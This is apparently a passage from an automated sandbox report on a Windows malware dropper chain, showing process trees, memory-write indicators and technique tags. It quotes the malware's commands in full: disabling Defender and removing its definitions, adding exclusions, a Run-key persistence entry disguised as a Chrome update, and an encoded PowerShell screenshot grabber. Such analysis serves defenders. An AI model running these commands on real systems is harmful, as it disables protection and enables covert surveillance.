Token: SeProfSingleProcessPrivilege	5168	WMIC.exe
Token: SeIncBasePriorityPrivilege	5168	WMIC.exe
Token: SeCreatePagefilePrivilege	5168	WMIC.exe
Token: SeBackupPrivilege	5168	WMIC.exe
Token: SeRestorePrivilege	5168	WMIC.exe
Token: SeShutdownPrivilege	5168	WMIC.exe
Token: SeDebugPrivilege	5168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5168	WMIC.exe
Token: SeRemoteShutdownPrivilege	5168	WMIC.exe
Token: SeUndockPrivilege	5168	WMIC.exe
Token: SeManageVolumePrivilege	5168	WMIC.exe
Token: 33	5168	WMIC.exe
Token: 34	5168	WMIC.exe
Token: 35	5168	WMIC.exe
Token: 36	5168	WMIC.exe
Token: SeDebugPrivilege	5608	powershell.exe
Token: SeDebugPrivilege	5616	powershell.exe
Token: SeDebugPrivilege	6312	taskkill.exe
Token: SeDebugPrivilege	6416	taskkill.exe
Token: SeDebugPrivilege	6648	taskkill.exe
Token: SeDebugPrivilege	6780	taskkill.exe
Token: SeDebugPrivilege	6880	taskkill.exe
Token: SeDebugPrivilege	6076	taskkill.exe
Token: SeDebugPrivilege	7092	taskkill.exe
Token: SeDebugPrivilege	7192	powershell.exe
Token: SeDebugPrivilege	7344	powershell.exe
Token: SeDebugPrivilege	7472	tasklist.exe
Token: SeDebugPrivilege	7632	Update.exe
Token: SeIncreaseQuotaPrivilege	5608	WMIC.exe
Token: SeSecurityPrivilege	5608	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Update.exe

pid process

7632 Update.exe

pid	process
7632	Update.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

main.exemain.execmd.exeBuild.exebased.exehacn.exehacn.exebased.execmd.execmd.execmd.exes.execmd.execmd.exesvchost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 5076 wrote to memory of 4824	5076	main.exe	main.exe
PID 5076 wrote to memory of 4824	5076	main.exe	main.exe
PID 4824 wrote to memory of 1504	4824	main.exe	cmd.exe
PID 4824 wrote to memory of 1504	4824	main.exe	cmd.exe
PID 1504 wrote to memory of 4704	1504	cmd.exe	Build.exe
PID 1504 wrote to memory of 4704	1504	cmd.exe	Build.exe
PID 1504 wrote to memory of 4704	1504	cmd.exe	Build.exe
PID 4704 wrote to memory of 3996	4704	Build.exe	hacn.exe
PID 4704 wrote to memory of 3996	4704	Build.exe	hacn.exe
PID 4704 wrote to memory of 2264	4704	Build.exe	based.exe
PID 4704 wrote to memory of 2264	4704	Build.exe	based.exe
PID 2264 wrote to memory of 4932	2264	based.exe	based.exe
PID 2264 wrote to memory of 4932	2264	based.exe	based.exe
PID 3996 wrote to memory of 568	3996	hacn.exe	hacn.exe
PID 3996 wrote to memory of 568	3996	hacn.exe	hacn.exe
PID 568 wrote to memory of 4924	568	hacn.exe	cmd.exe
PID 568 wrote to memory of 4924	568	hacn.exe	cmd.exe
PID 4932 wrote to memory of 2056	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2056	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2828	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2828	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 1400	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 1400	4932	based.exe	cmd.exe
PID 2828 wrote to memory of 644	2828	cmd.exe	powershell.exe
PID 2828 wrote to memory of 644	2828	cmd.exe	powershell.exe
PID 1400 wrote to memory of 1800	1400	cmd.exe	powershell.exe
PID 1400 wrote to memory of 1800	1400	cmd.exe	powershell.exe
PID 2056 wrote to memory of 260	2056	cmd.exe	powershell.exe
PID 2056 wrote to memory of 260	2056	cmd.exe	powershell.exe
PID 4244 wrote to memory of 4548	4244	s.exe	main.exe
PID 4244 wrote to memory of 4548	4244	s.exe	main.exe
PID 4932 wrote to memory of 3300	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 3300	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2316	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2316	4932	based.exe	cmd.exe
PID 4244 wrote to memory of 3464	4244	s.exe	svchost.exe
PID 4244 wrote to memory of 3464	4244	s.exe	svchost.exe
PID 4932 wrote to memory of 1600	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 1600	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 1528	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 1528	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 4372	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 4372	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 4472	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 4472	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 4960	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 4960	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2684	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2684	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2908	4932	based.exe	cmd.exe
PID 4932 wrote to memory of 2908	4932	based.exe	cmd.exe
PID 1600 wrote to memory of 5168	1600	cmd.exe	WMIC.exe
PID 1600 wrote to memory of 5168	1600	cmd.exe	WMIC.exe
PID 2316 wrote to memory of 5184	2316	cmd.exe	tasklist.exe
PID 2316 wrote to memory of 5184	2316	cmd.exe	tasklist.exe
PID 3464 wrote to memory of 5208	3464	svchost.exe	svchost.exe
PID 3464 wrote to memory of 5208	3464	svchost.exe	svchost.exe
PID 3300 wrote to memory of 5284	3300	cmd.exe	tasklist.exe
PID 3300 wrote to memory of 5284	3300	cmd.exe	tasklist.exe
PID 2908 wrote to memory of 5600	2908	cmd.exe	tasklist.exe
PID 2908 wrote to memory of 5600	2908	cmd.exe	tasklist.exe
PID 4372 wrote to memory of 5608	4372	cmd.exe	powershell.exe
PID 4372 wrote to memory of 5608	4372	cmd.exe	powershell.exe
PID 1528 wrote to memory of 5616	1528	cmd.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:336

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1192
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3036
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1468
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2036

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2440

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2084

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3176

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3336
- C:\Users\Admin\AppData\Local\Temp\main.exe
  "C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5076
- - C:\Users\Admin\AppData\Local\Temp\main.exe
    "C:\Users\Admin\AppData\Local\Temp\main.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI50762\Build.exe -pbeznogym
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1504
    - - C:\Users\Admin\AppData\Local\Temp\_MEI50762\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI50762\Build.exe -pbeznogym
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4704
      - C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3996
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI39962\s.exe -pbeznogym
        8⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\_MEI39962\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI39962\s.exe -pbeznogym
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4244
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4548
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9CF7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9CF7.tmp.bat
        11⤵
        
        PID:7300
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 4548"
        12⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:7472
        
        C:\Windows\system32\find.exe
        
        find ":"
        12⤵
        
        PID:7520
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:7800
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:7632
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        13⤵
        
        PID:7936
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        14⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:4244
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3464
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:3868
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        
        PID:6104
      - C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2264
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:4932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏ .scr'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏ .scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3300
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2316
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1600
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA